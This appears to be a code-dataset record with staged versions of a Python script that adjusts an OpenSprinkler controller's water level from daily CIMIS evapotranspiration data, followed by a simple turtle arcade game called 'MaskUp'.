"step-1": "<mask token>\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print('Could not retrieve datafile ' + tempfile)\n exit(-1)\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print('No et found for ' + datestr)\n exit(-1)\n new_water_level = int(et / base_et * 100)\n print('New Water Level will be %d' % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, '%-m/%-d/%Y')\n\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print('Found et for ' + datestr + ': ' + str(et))\n os.remove(tempfile)\n return et\n\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()\n ) + '.csv'\n\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\n 'OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD'\n )\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = ''\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Old water level: %s\\n' % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash,\n new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Successfully set to new value %s\\n' % {res['wl']}\n return status\n\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(TopicArn=\n 'arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status, Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print('Could not retrieve datafile ' + tempfile)\n exit(-1)\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print('No et found for ' + datestr)\n exit(-1)\n new_water_level = int(et / base_et * 100)\n print('New Water Level will be %d' % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, '%-m/%-d/%Y')\n\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print('Found et for ' + datestr + ': ' + str(et))\n os.remove(tempfile)\n return et\n\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()\n ) + '.csv'\n\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\n 'OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD'\n )\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = ''\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Old water level: %s\\n' % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash,\n new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Successfully set to new value %s\\n' % {res['wl']}\n return status\n\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(TopicArn=\n 'arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status, Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string')\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nuri = 'ftp://ftpcimis.water.ca.gov/pub2/daily/daily107.csv'\nbase_et = 0.15\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print('Could not retrieve datafile ' + tempfile)\n exit(-1)\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print('No et found for ' + datestr)\n exit(-1)\n new_water_level = int(et / base_et * 100)\n print('New Water Level will be %d' % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, '%-m/%-d/%Y')\n\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print('Found et for ' + datestr + ': ' + str(et))\n os.remove(tempfile)\n return et\n\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()\n ) + '.csv'\n\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\n 'OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD'\n )\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = ''\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Old water level: %s\\n' % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash,\n new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Successfully set to new value %s\\n' % {res['wl']}\n return status\n\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(TopicArn=\n 'arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status, Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os, sys, datetime, pytz, tzlocal, urllib.request, requests, csv, hashlib, json, boto3\nuri = 'ftp://ftpcimis.water.ca.gov/pub2/daily/daily107.csv'\nbase_et = 0.15\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print('Could not retrieve datafile ' + tempfile)\n exit(-1)\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print('No et found for ' + datestr)\n exit(-1)\n new_water_level = int(et / base_et * 100)\n print('New Water Level will be %d' % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, '%-m/%-d/%Y')\n\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print('Found et for ' + datestr + ': ' + str(et))\n os.remove(tempfile)\n return et\n\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()\n ) + '.csv'\n\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\n 'OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD'\n )\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = ''\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Old water level: %s\\n' % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash,\n new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + 'Successfully set to new value %s\\n' % {res['wl']}\n return status\n\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(TopicArn=\n 'arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status, Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import os, sys, datetime, pytz, tzlocal, urllib.request, requests, csv, hashlib, json, boto3\n\nuri = 'ftp://ftpcimis.water.ca.gov/pub2/daily/daily107.csv' #Station 107 is Santa Barbara\nbase_et = 0.15\n\n\ndef main():\n try:\n tempfile = tempfile_name()\n get_datafile(tempfile)\n except:\n print(\"Could not retrieve datafile \" + tempfile)\n exit(-1)\n\n et = get_yesterdays_et(tempfile)\n if et == -1.0:\n print(\"No et found for \" + datestr)\n exit(-1)\n\n new_water_level = int(et/base_et * 100)\n print(\"New Water Level will be %d\" % new_water_level)\n status = set_os_et(new_water_level)\n notify(status)\n exit(0)\n\ndef yesterday():\n dt = datetime.datetime.now(datetime.timezone.utc)\n local_timezone = tzlocal.get_localzone()\n dt = dt.astimezone(local_timezone)\n delta = datetime.timedelta(1)\n dt = dt - delta\n return datetime.datetime.strftime(dt, \"%-m/%-d/%Y\")\n\ndef get_yesterdays_et(tempfile):\n datestr = yesterday()\n et = -1.0\n with open(tempfile, 'r') as tmp:\n rdr = csv.reader(tmp)\n for r in rdr:\n if r[1] == datestr:\n et = float(r[3])\n print(\"Found et for \" + datestr + \": \" + str(et))\n os.remove(tempfile)\n return et\n\ndef tempfile_name():\n return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()) + '.csv'\n\ndef get_datafile(tempfile):\n global uri\n urllib.request.urlretrieve(uri, tempfile)\n\ndef get_password():\n try:\n pw = os.environ['OPENSPRINKLER_PASSWORD']\n except:\n print(\"OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD\")\n exit(-1)\n pw = pw.encode('ascii')\n m = hashlib.md5()\n m.update(pw)\n return m.hexdigest()\n\ndef set_os_et(new_water_level):\n hash = get_password()\n status = \"\"\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + \"Old water level: %s\\n\" % {res['wl']}\n r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash, new_water_level))\n r = requests.get('http://192.168.1.13/jo?pw=' + hash)\n res = json.loads(r.text)\n status = status + \"Successfully set to new value %s\\n\" % {res['wl']}\n return status\n\ndef notify(status):\n session = boto3.Session(profile_name='trbryan')\n sns = session.client('sns')\n response = sns.publish(\n TopicArn='arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',\n Message=status,\n Subject='Daily OpenSprinkler ET Adjustment',\n MessageStructure='string',\n )\n\n\nif __name__ == \"__main__\": main()",
"step-ids": [
8,
9,
10,
11,
12
]
}
|
[
8,
9,
10,
11,
12
] |
import turtle
import random
import winsound
import sys
""" new_game = False
def toggle_new_game():
global new_game
if new_game == False:
new_game = True
else:
new_game = False """
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)
wn.register_shape("human.gif")
def game_loop():
score = 0
lives = 3
wn.register_shape("human.gif")
wn.register_shape("Evil-Virus.gif")
wn.register_shape("surgical-mask.gif")
# Add the player
player = turtle.Turtle()
player.speed(0)
player.shape("human.gif")
player.color("white")
player.penup()
player.goto(0, -250)
player.direction = "stop"
# Create a list of good guys
good_guys = []
# Add the good_guys
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape("surgical-mask.gif")
good_guy.color("blue")
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
# Create a list of bad guys
bad_guys = []
# Add the bad_guys
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape("Evil-Virus.gif")
bad_guy.color("red")
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
# Make the pen
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape("square")
pen.color("white")
pen.penup()
pen.goto(0, 260)
font = ("Courier", 24, "normal")
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
# Make the message
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color("yellow")
message.penup()
message.goto(0, 0)
font = ("Calibri", 24, "bold")
message.write("GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!".format(score), align="center", font=font)
# Functions
def go_left():
player.direction = "left"
def go_right():
player.direction = "right"
def stop_player():
player.direction = "stop"
# Keyboard Binding
wn.listen()
wn.onkeypress(go_left, "Left")
wn.onkeyrelease(stop_player, "Left")
wn.onkeypress(go_right, "Right")
wn.onkeyrelease(stop_player, "Right")
while True:
# Update screen
wn.update()
# Move the player
if player.direction == "left":
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == "right":
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
# Move the good guys
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
# Check if off the screen
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
# Check for a collision with player
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
winsound.PlaySound("video_game_retro_8bit_coin", winsound.SND_FILENAME)
# Move the bad guys
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
# Check if off the screen
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
# Check for a collision with player
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
winsound.PlaySound("arcade_game_alarm_short", winsound.SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound("game_over_sound", winsound.SND_FILENAME)
# wn.listen()
# if wn.onkeypress(toggle_new_game, "a"):
# if new_game == True:
break
# wn.onkeypress(sys.exit(), "q")
while True:
# Update screen
wn.update()
# Play music
wn.bgpic("retro_city.gif")
winsound.PlaySound("retro_video_game_music-trimmed", winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)
#sys.exit()
wn.mainloop()
|
normal
|
{
"blob_id": "1593280a29b13461b13d8b2805d9ac53ce94c759",
"index": 2948,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-3": "<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-4": "import turtle\nimport random\nimport winsound\nimport sys\n<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-5": "\r\nimport turtle\r\nimport random\r\nimport winsound\r\nimport sys\r\n\r\n\r\n\r\n\"\"\" new_game = False\r\n\r\ndef toggle_new_game():\r\n global new_game\r\n if new_game == False:\r\n new_game = True\r\n else:\r\n new_game = False \"\"\"\r\n\r\nwn = turtle.Screen()\r\nwn.title(\"MaskUp\")\r\nwn.bgcolor(\"green\")\r\nwn.bgpic(\"retro_city_title_page.gif\")\r\nwn.setup(width=800, height=600)\r\nwn.tracer(0)\r\nwn.register_shape(\"human.gif\")\r\n\r\n\r\ndef game_loop():\r\n score = 0\r\n lives = 3\r\n\r\n wn.register_shape(\"human.gif\")\r\n wn.register_shape(\"Evil-Virus.gif\")\r\n wn.register_shape(\"surgical-mask.gif\")\r\n\r\n # Add the player\r\n player = turtle.Turtle()\r\n player.speed(0)\r\n player.shape(\"human.gif\")\r\n player.color(\"white\")\r\n player.penup()\r\n player.goto(0, -250)\r\n player.direction = \"stop\"\r\n\r\n\r\n # Create a list of good guys\r\n good_guys = []\r\n\r\n # Add the good_guys\r\n for _ in range(3):\r\n good_guy = turtle.Turtle()\r\n good_guy.speed(0)\r\n good_guy.shape(\"surgical-mask.gif\")\r\n good_guy.color(\"blue\")\r\n good_guy.penup()\r\n good_guy.goto(-100, 250)\r\n good_guy.speed = random.uniform(0.3, 2.0)\r\n good_guys.append(good_guy)\r\n\r\n # Create a list of bad guys\r\n bad_guys = []\r\n\r\n # Add the bad_guys\r\n for _ in range(5):\r\n bad_guy = turtle.Turtle()\r\n bad_guy.speed(0)\r\n bad_guy.shape(\"Evil-Virus.gif\")\r\n bad_guy.color(\"red\")\r\n bad_guy.penup()\r\n bad_guy.goto(100, 250)\r\n bad_guy.speed = random.uniform(0.3, 1.0)\r\n bad_guys.append(bad_guy)\r\n\r\n \r\n # Make the pen\r\n pen = turtle.Turtle()\r\n pen.hideturtle()\r\n pen.speed(0)\r\n pen.shape(\"square\")\r\n pen.color(\"white\")\r\n pen.penup()\r\n pen.goto(0, 260)\r\n font = (\"Courier\", 24, \"normal\")\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n\r\n # Make the message\r\n def show_message(score):\r\n message = turtle.Turtle()\r\n message.hideturtle()\r\n message.speed(0)\r\n message.color(\"yellow\")\r\n 